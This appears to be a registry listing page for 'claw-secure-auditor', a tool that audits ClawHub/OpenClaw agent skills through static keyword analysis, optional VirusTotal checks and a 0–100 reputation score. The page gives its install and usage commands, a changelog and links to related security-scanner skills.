claw-secure-auditor

Security audit tool for ClawHub/OpenClaw skills (static analysis + reputation scoring)

Safety Notice

This listing is from the official public ClawHub registry. Review SKILL.md and referenced scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "claw-secure-auditor" with this command: npx skills add emeraldring3134-netizen/claw-secure-auditor

🛡️ Claw Secure Auditor v1.1.1

Security audit tool for ClawHub/OpenClaw skills with static analysis and reputation scoring.

🚀 Quick Start

1. Configure (optional)

export VIRUSTOTAL_API_KEY="your-api-key-here"

2. Use

# Quick audit (static + reputation)
python3 scripts/auditor.py quick ./my-skill

# Full audit (static + sandbox + VirusTotal)
python3 scripts/auditor.py full ./my-skill

# Pre-publish audit
python3 scripts/auditor.py before-publish ./my-skill

📋 Features

  • ✅ Static analysis: 120+ dangerous keyword detection
  • ✅ Self-whitelist: auto-mark self as safe
  • ✅ Reputation score: 0-100 with Safe/Caution/Dangerous levels
  • ✅ JSON report export
  • ✅ Read-only operation, no file modification

📊 Risk Levels

ScoreLevelColor
90-100Safe🟢
70-89Caution🟡
0-69Dangerous🔴

📌 Usage Examples

python3 scripts/auditor.py quick ./my-skill
python3 scripts/auditor.py full ./my-skill
python3 scripts/auditor.py before-publish ./my-new-skill

⚠️ Security Note

Read-only operation, no file modification, no external writes, API keys only for public data queries.

📝 Changelog

v1.1.1 (2026-03)

  • Simplified metadata for ClawHub compatibility
  • Removed complex dependencies
  • Kept core audit functionality

v1.1.0 (2026-03)

  • Self-whitelist: auto-mark self as safe
  • Full English translation
  • Improved scoring algorithm

v1.0.0 (2026-03)

  • Initial release with 120+ pattern detection

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open Registry RecordOpen in ClawHub

Related Skills

Related by shared tags or category signals.

Security

Security Checker

Security scanner for Python skills before publishing to ClawHub. Use before publishing any skill to check for dangerous imports, hardcoded secrets, unsafe file operations, and dangerous functions like eval/exec/subprocess. Essential for maintaining trust and ensuring published skills are safe for others to install and run.

Registry SourceRecently Updated
01.1K
Profile unavailable
Security

Security Check

🔒 Pre-installation security verification for external code and dependencies. Automated risk analysis for GitHub repos, npm packages, PyPI libraries, and she...

Registry SourceRecently Updated
098
Profile unavailable
Security

aegis-skill-vetter

Enterprise-grade security vetting protocol for AI agent skills. Automated threat detection, quantified risk scoring, and zero-trust code analysis.

Registry SourceRecently Updated
1257
Profile unavailable